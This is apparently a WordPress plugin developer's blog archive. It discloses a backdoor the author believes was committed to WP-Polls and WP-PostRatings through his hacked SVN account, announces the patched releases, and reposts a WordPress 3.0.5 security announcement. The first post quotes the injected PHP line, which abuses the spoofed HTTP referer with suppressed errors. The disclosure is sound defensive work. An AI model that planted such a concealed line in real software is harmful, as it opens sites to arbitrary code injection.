Code Injection Follow Up

I have release 2 security updates to WP-Polls and WP-PostRatings which basically removes a malicious code that allows code injection.

The malicious code is as follows:

if ($_SERVER['PHP_SELF'] == @links_add_base_url("/", $_SERVER['HTTP_REFERER']))
return;

The code itself does nothing, but hackers are spoofing the $_SERVER['HTTP_REFERER'] that allows arbitrary code injection and note the @ sign which surpress all errors and hence the error will not be displayed.

I am 100% sure based on the points below that the code was not added by me. I am beginning to believe that my account was hacked.

  • Personally, I have no idea what links_add_base_url() does and hence it is impossible for me to place it in my own plugin code.
  • I checked the commit date for the changeset of WP-PostRatings and the date/time is 11/04/10 22:10:13. Since I am on the GMT+8 zone, it is 6am for me. I do not wake up at 6am just to update my plugin.
  • The above changeset is for trunk. However in my readme.txt, I have state that the stable tag is 1.50 and hence the file is copied to /tags/1.50/ in this changeset, but if you note the time, it is 11/05/10 00:52:39. This is almost 3 hours after the trunk commit and it is almost 9am on my timezone and I will be in my office and my office’s computer does not have SVN copies of my plugin. So it is also not possible for me to commit that file
  • If you notice the same changeset, the file is being copied from trunk to tags/1.50 by SVN copy. I do not do a SVN copy for my plugins, normally I will just copy and paste the files using my Windows Explorer.
  • For WP-Polls, there is only 1 changeset as my stable tag is from trunk and the timestamp is 11/05/10 12:30:07. This is about 12 hours after the changeset of WP-PostRatings. On my timezone it is about 8.30pm and it is not possible for me to check-in because 8pm to 9pm is my dinner time and I always eat out.
  • For WP-WAP, there is almost 2 suspicious commit, here and here. As I do not develop WP-Wap anymore, there is no reason for me to commit something to it

I am going to review all my commits to the SVN to ensure that there are no more suspicious code being added.

1 Star2 Stars3 Stars4 Stars5 Stars (87 votes, average: 3.93 out of 5)

WP-PostRatings 1.61

I have released WP-PostRatings 1.61 which fixes a code injection via “HTTP Referrer” and affects users who are on WP-PostRatings 1.50 only. This is the same code injection fixed for WP-Polls few days back.

I have checked the rest of my plugins to ensure that the code is not in anymore of my plugins. Sorry for any inconvenienced cased.

Similar to WP-Polls, I also took this chance to port the readme.html to the proper readme.txt which WordPress.org is using and now you can see all the details of WP-PostRatings right from the plugins page itself regardless if it is from your WP-Admin or WordPress.org.

All users should upgrade now

Props to Dion Hulse aka dd32 for the report!

Download: WP-PostRatings 1.61

1 Star2 Stars3 Stars4 Stars5 Stars (260 votes, average: 4.00 out of 5)

WP-Polls 2.61

I have released WP-Polls 2.61 which fixes a code injection via “HTTP Referrer” and affects users who are on WP-Polls 2.60 only.

I also took this chance to port the readme.html to the proper readme.txt which WordPress.org is using and now you can see all the details of WP-Polls right from the plugins page itself regardless if it is from your WP-Admin or WordPress.org.

All users should upgrade now

Vulnerability discovered by + Props to:

Dweeks, Leon Juranic and Chad Lavoie of the Swiftwill Security Team (www.swiftwill.com)

Download: WP-Polls 2.61

1 Star2 Stars3 Stars4 Stars5 Stars (97 votes, average: 3.93 out of 5)

WordPress 3.0.5 & 3.1 RC4

WordPress 3.0.5 & 3.1 RC4 has been released:

WordPress 3.0.5

WordPress 3.0.5 is now available and is a security hardening update for all previous WordPress versions.

This security release is required if you have any untrusted user accounts, but it also comes with important security enhancements and hardening. All WordPress users are strongly encouraged to update.

Three point oh point five

Enhances security

Three point one comes soon

The release addresses a number of issues and provides two additional enhancements:

Two moderate security issues were fixed that could have allowed a Contributor- or Author-level user to gain further access to the site.

One information disclosure issue was addressed that could have allowed an Author-level user to view contents of posts they should not be able to see, such as draft or private posts.

Two security enhancements were added. One improved the security of any plugins which were not properly leveraging our security API. The other offers additional defense in depth against a vulnerability that was fixed in previous release.

Thanks to Nils Jueneman and Saddy for their private and responsible disclosures to security@wordpress.org for two of the issues. The others were reported or repaired by our security team.

Changelog: WordPress 3.0.5
Download: WordPress 3.0.5
Download: Modified files since WordPress 3.0.4

WordPress 3.1 RC4

The Release Candidate 4 build includes the security fixes and enhancements included in 3.0.5 and addresses about two dozen additional bugs. This includes fixes for:

  • Deleting a user and reassigning their posts to another user.
  • Marking multiple users or sites as spam in multisite.
  • PHP4 compatibility.

As outlined in previous RC posts, if you are testing the release candidate and think you’ve found a bug, there are a few ways to let us know:

To test WordPress 3.1, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can download the release candidate here (zip). If any new issues become known, you’ll be able to find them here.

After nearly five months of development and testing, we think we’re very close to a final release. Users and developers, please test your themes and plugins.

Download: WordPress 3.1 RC4

1 Star2 Stars3 Stars4 Stars5 Stars (92 votes, average: 3.92 out of 5)